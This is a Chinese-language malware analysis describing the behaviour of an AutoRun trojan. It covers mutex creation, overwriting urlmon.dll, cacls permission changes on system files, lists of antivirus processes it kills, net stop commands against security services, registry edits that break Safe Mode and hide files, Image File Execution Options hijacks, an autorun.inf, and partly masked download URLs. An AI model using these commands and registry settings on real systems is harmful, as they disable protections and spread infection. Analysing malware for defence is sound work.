Win32.Troj.AutoRun.98304【
explorer.exe,autorun.inf】
编写语言:Borland Delphi 6.0 - 7.0
1,创建一个名为“system"互斥变量 只允许一个进程实例
2,自己带了一个sssurl.dll 覆盖系统
文件 urlmon.dll是怕这个
文件因为某种原因被删除了吗?(验证以后sssurl.dll就是
urlmon.dll)
3,获取packet.dll ,pthreadVC.dll ,wpcap.dll,npf.sys 的等所有权为了后面的某些活动做准备 估计会下载流氓软件和
arp
病毒。并通过启动文件夹这里启动
cacls C:\windows\system32\packet.dll /e /p everyone:f
cacls C:\windows\system32\pthreadVC.dll /e /p everyone:f
cacls C:\windows\system32\wpcap.dll /e /p everyone:f
cacls C:\windows\system32\drivers\npf.sys /e /p everyone:f
cacls C:\windows\system32\npptools.dll /e /p everyone:f
cacls C:\windows\system32\drivers\acpidisk.sys /e /p everyone:f
cacls C:\windows\system32\wanpacket.dll /e /p everyone:f
cacls C:\Documents and Settings\All Users\「开始」菜单\程序\启动 /e /p everyone:f
4,然后提升自己的战斗力 获取debug权限 枚举所有进程,找到以下进程目然后干掉,结束了几款arp防火墙的进程估计下载的病毒里面会有arp病毒
360Safe.exe
360tray.exe
VsTskMgr.exe
UpdaterUI.exe
runiep.exe
TBMon.exe
KASARP.exe
scan32.exe
VPC32.exe
VPTRAY.exe
ANTIARP.exe
KRegEx.exe
KvXP.kxp
kvsrvxp.kxp
kvsrvxp.exe
KVWSC.EXE
Iparmor.exe
AST.EXE
5,每隔 200ms执行net stop 命令关闭安全软件的服务
net stop KPfwSvc
net stop KWhatchsvc
net stop McShield
net stop Norton AntiVirus Server
6,修改注册表 破坏安全模式和隐藏文件显示
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
CheckedValue = 0x000006B8
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
(Default) = "DiskDrive"
7.映像挟持金山
arp防火墙等安全工具
360rpt.EXE
360safe.EXE
360tray.EXE
ANTIARP.exe
Ast.EXE
AutoRunKiller.exe
AvMonitor.EXE
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
IceSword.EXE
Iparmor.EXE
KASARP.exe
KRegEx.EXE
KVMonxp.kxp
KVSrvXP.EXE
KVWSC.EXE
Mmsk.EXE
Navapsvc.EXE
Nod32kui.EXE
QQDOCTOR.EXE
Regedit.EXE
VPC32.exe
VPTRAY.exe
WOPTILITIES.EXE
Wuauclt.EXE
~.EXE
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]
Debugger = "%Systemroot%\system32\wuauc1t.exe"
8,整个autorun.inf 和explorer到分区根目录下面
[autorun]
shell\open=打开(&O)
shell\open\Command=explorer.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\command=explorer.exe
9,后台下载以下文件然后一次保存为system.pif。win1.pif---win20.pif依次运行之
俺这边能够下载的有以下链接
h**tp://xx.trojxxx.com/dd/1.exe
h**tp://xx.trojxxx.com/dd/2.exe
h**tp://xx.trojxxx.com/dd/4.exe
h**tp://xx.trojxxx.com/dd/5.exe
h**tp://xx.trojxxx.com/dd/7.exe
h**tp://xx.trojxxx.com/dd/8.exe
h**tp://xx.trojxxx.com/dd/9.exe
h**tp://xx.trojxxx.com/dd/12.exe
h**tp://xx.trojxxx.com/dd/self.gif
以下链接失效
h**tp://xx.trojxxx.com/dd/gz.exe
h**tp://xx.trojxxx.com/dd/do.exe
h**tp://xx.trojxxx.com/dd/ar.exe
h**tp://xx.trojxxx.com/dd/3.exe
h**tp://xx.trojxxx.com/dd/6.exe
h**tp://xx.trojxxx.com/dd/10.exe
h**tp://xx.trojxxx.com/dd/11.exe
h**tp://xx.trojxxx.com/dd/13.exe
h**tp://xx.trojxxx.com/dd/14.exe
h**tp://xx.trojxxx.com/dd/15.exe
h**tp://xx.trojxxx.com/dd/16.exe
h**tp://xx.trojxxx.com/dd/17.exe
